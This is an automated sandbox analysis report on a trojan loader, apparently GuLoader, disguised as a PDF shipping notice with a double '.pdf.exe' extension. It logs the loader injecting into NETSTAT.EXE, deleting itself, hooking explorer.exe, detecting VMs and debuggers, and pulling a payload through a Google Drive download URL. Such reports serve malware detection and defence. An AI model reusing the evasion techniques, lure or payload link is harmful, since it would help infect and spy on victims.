    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32E00 NtQueueApcThread,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32FB0 NtSetValueKey,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32F30 NtOpenDirectoryObject,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA33C90 NtOpenThread,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32CD0 NtEnumerateKey,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32C20 NtSetInformationFile,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA33C30 NtOpenProcessToken,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32C10 NtOpenProcess,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32D50 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32AA0 NtQueryInformationFile,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32A80 NtClose,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32AC0 NtEnumerateValueKey,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32A10 NtWriteFile,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32B80 NtCreateKey,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32BE0 NtQueryVirtualMemory,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32B20 NtQueryInformationProcess,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA32B00 NtQueryValueKey,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA338D0 NtGetContextThread,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA329D0 NtWaitForSingleObject,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA334E0 NtCreateMutant,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA34570 NtSuspendThread,
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA34260 NtSetContextThread,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF34E0 NtCreateMutant,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2A80 NtClose,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2BC0 NtQueryInformationToken,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2B90 NtFreeVirtualMemory,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2B80 NtCreateKey,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2B10 NtAllocateVirtualMemory,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2B00 NtQueryValueKey,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF29F0 NtReadFile,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2E50 NtCreateSection,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2F00 NtCreateFile,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2CF0 NtDelayExecution,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2C30 NtMapViewOfSection,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2D10 NtQuerySystemInformation,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF4260 NtSetContextThread,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF4570 NtSuspendThread,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2AC0 NtEnumerateValueKey,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2AA0 NtQueryInformationFile,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2A10 NtWriteFile,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2BE0 NtQueryVirtualMemory,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2B20 NtQueryInformationProcess,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF38D0 NtGetContextThread,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF29D0 NtWaitForSingleObject,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2ED0 NtResumeThread,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2EC0 NtQuerySection,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2EB0 NtProtectVirtualMemory,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2E80 NtCreateProcessEx,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2E00 NtQueueApcThread,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2FB0 NtSetValueKey,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2F30 NtOpenDirectoryObject,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2CD0 NtEnumerateKey,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF3C90 NtOpenThread,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2C50 NtUnmapViewOfSection,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF3C30 NtOpenProcessToken,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2C20 NtSetInformationFile,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2C10 NtOpenProcess,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2DA0 NtReadVirtualMemory,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FF2D50 NtWriteVirtualMemory,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281A350 NtCreateFile,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281A480 NtClose,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281A400 NtReadFile,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281A530 NtAllocateVirtualMemory,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281A3FA NtReadFile,
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281A52A NtAllocateVirtualMemory,
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000000.22296662367.000000000042C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22830890524.000000001EC90000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeBinary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeSection loaded: edgegdi.dll
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeSection loaded: edgegdi.dll
    Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: edgegdi.dll
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeStatic PE information: invalid certificate
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeVirustotal: Detection: 37%
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeReversingLabs: Detection: 31%
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
    Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\~DF37AB796C0CD232D7.TMPJump to behavior
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@23/11
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_03
    Source: Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
    Source: Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
    Source: Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
    Source: Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_00403EA8 push es; ret
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_00406105 pushfd ; ret
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_004057C0 push esp; ret
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B63C50 pushad ; retf
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6593E push di; ret
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6590E push di; ret
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B65372 pushfd ; ret
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6255E push edx; retf
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1E9F08CD push ecx; mov dword ptr [esp], ecx
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_005740AC push 8482D2CCh; retf
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FB08CD push ecx; mov dword ptr [esp], ecx
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281C0DA push edx; ret
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_028171D9 push es; retf
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281D4A5 push eax; ret
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281D4F2 push eax; ret
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281D4FB push eax; ret
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281D55C push eax; ret
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281696B push ebp; ret
    Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0281DE1A push ss; iretd
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeFile created: \arrival notice, cia awb inv form.pdf.exe
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeFile created: \arrival notice, cia awb inv form.pdf.exe

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Modifies the prolog of user mode functions (user mode inline hooks)Show sources
    Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xED
    Self deletion via cmd deleteShow sources
    Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
    Uses an obfuscated file name to hide its real file extension (double extension)Show sources
    Source: Possible double extension: pdf.exeStatic PE information: Arrival Notice, CIA Awb Inv Form.pdf.exe
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16IGYRUBEYI1SLH2LFQBJS2GGTY9BFGFC
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301946477.00000000005E4000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE(Q^
    Source: C:\Windows\explorer.exe TID: 4296Thread sleep count: 160 > 30
    Source: C:\Windows\explorer.exe TID: 4296Thread sleep time: -320000s >= -30000s
    Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4432Thread sleep count: 111 > 30
    Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4432Thread sleep time: -222000s >= -30000s
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
    Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6CE40 rdtsc
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeSystem information queried: ModuleInformation
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: vmicvss
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707817785.000000001066F000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301946477.00000000005E4000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe(Q^
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWlS
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW@
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

    Anti Debugging:

    barindex
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA6CE40 rdtsc
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6F8FD mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B718FC mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B70232 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 1_2_02B6C602 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EA2CEA0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB0EAD mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exeCode function: 6_2_1EAB0EAD mov eax, dword ptr fs:[00000030h]
